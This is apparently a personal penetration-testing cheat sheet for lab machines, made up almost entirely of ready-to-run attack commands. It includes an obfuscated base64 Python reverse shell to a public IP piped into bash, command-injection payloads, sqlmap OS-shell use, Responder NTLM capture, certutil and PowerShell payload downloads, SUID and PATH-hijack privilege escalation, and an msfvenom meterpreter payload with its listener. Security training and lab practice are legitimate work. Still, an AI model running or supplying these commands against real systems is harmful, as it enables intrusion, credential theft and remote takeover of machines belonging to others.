nmap

sudo nmap -n -sS -sV -Pn -p- 192.168.108.124 -min-rate 5000

Web Directory Scan

Gobuster

gobuster dir -u http://192.168.108.124:5357 -w /usr/share/wordlists/dirb/common.txt
gobuster vhost -u http://thetoppers.htb -w /usr/share/wordlists/wfuzz/general/common.txt --append-domain
gobuster dns -d thetoppers.htb -w /usr/share/wordlists/wfuzz/general/common.txt

Also, Gobuster can be used to enumerate subdomain, it is very useful tools.

dirb

dirb http://192.168.108.124:5357

Reverse shell

https://www.revshells.com/

Python base64 reverse shell

echo cHl0aG9uMyAtYyAnaW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjU0LjIxMS42NC45NiIsMTIzNCkpO29zLmR1cDIocy5maWxlbm8oKSwwKTsgb3MuZHVwMihzLmZpbGVubygpLDEpO29zLmR1cDIocy5maWxlbm8oKSwyKTtpbXBvcnQgcHR5OyBwdHkuc3Bhd24oInNoIikn|base64 -d|bash

Base64 Encode & Decode

Encode

https://www.base64encode.org/

Decode

https://www.base64decode.org/

John (Crack hash)

sudo gunzip /usr/share/wordlists/rockyou.txt.gz

john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt

Zip2John

zip2john crack_me.zip > hash.txt

Command Injection Test

& sleep 5
& ping -c 4 192.168.110.110 
$ | ;

tcpdump to check ping

sudo tcpdump -i eth0 -n icmp

Sqlmap

sqlmap -u "http://10.129.238.47/dashboard.php?search=123" --random-agent --threads 5 --batch --level=5 --risk=3 --sql-shell

--sql-shell
--os-shell (add --web-root=/var/www/html can specific the website path)
--dump-all

Enum mysql

SELECT * FROM INFORMATION_SCHEMA.TABLES 
SELECT schema_name FROM information_schema.schemata --show all db 
SELECT table_name FROM information_schema.tables where table_schema='db name'--show all tables

Create web server on host

python -m http.server 8000

Set python version

pyenv local 2.7.16

NFS

Remind port 111

showmount -e 10.10.10.180
sudo mount -t nfs 10.10.10.180:/site_backups /home/kali/Desktop/site_backups

SMB

smbclient -L ////192.168.108.124 # list smb
smbclient -U "DOMAIN\user_name" //server_name/share_name # connect to smb share
smb: \> d /example/ # go to example directory
smb: \example\> get example.txt # download example.txt

Responder (Used to steal ntlm via SMB)

sudo responder -I eth0

enum4linux

enum4linux 192.168.108.124

unmount

sudo umount -l /home/kali/Desktop/site_backups

Windows Download File

certutil

certutil.exe -urlcache -split -f "http://10.10.14.10:8000/winPEAS.bat" winPEAS.bat

Powershell

$url = "http://10.10.14.10:8000/winPEASany.exe"
$path = "C:\tmp\winPEASany.exe"
(New-Object System.Net.WebClient).DownloadFile($url,$path)

Privilege Escalation

linpeas & winpeas

https://github.com/carlospolop/PEASS-ng/releases/tag/20230702-bc7ce3ac

pspy (Used to monitor what process is running immediately)

https://github.com/DominicBreuker/pspy/releases/tag/v1.2.1

vim run shell

:!/bin/bash

SUID

chmod u+s /bin/bash
ls -la /bin/bash
/bin/bash -p

Environment Variable

cd /tmp
echo '/bin/bash' > cat
chmod +x cat
sudo PATH=/tmp:$PATH /opt/cleanup.sh
id

JuicyPotatoNG

JuicyPotatoNG.exe -t * -p "C:\Windows\System32\powershell.exe" -a "revshell params"

Common exploit

CVE-2022-2588 (Linux use)

https://github.com/Markakd/CVE-2022-2588

MS08-067 (Windows XP use)

https://eslam3kl.medium.com/hack-the-box-legacy-c245030172ae

MS17-010 (Eternal Blue)

https://u1sp00kies.medium.com/hack-the-box-htb-blue-walkthrough-7dac9505bc9c

CVE-2023-21746 (Need compile exploit)

https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks/blob/main/handbooks/cve.md#CVE-2023-21746-Windows-NTLM-EoP-LocalPotato-LPE

Metasploit

msfvenom

msfvenom --list format
msfvenom --list payloads
msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.119.121 LPORT=4444 -b '\x0A\x1A\x2F\x95\xA7\x00' -f raw -o exploit.txt

Receive reverse_tcp

sudo msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.119.121
set lport 4444
run

Local exploit suggester (Metasploit)

search local_exploit_suggester
options
set session 1
run

Background session

bacground
sessions -i 1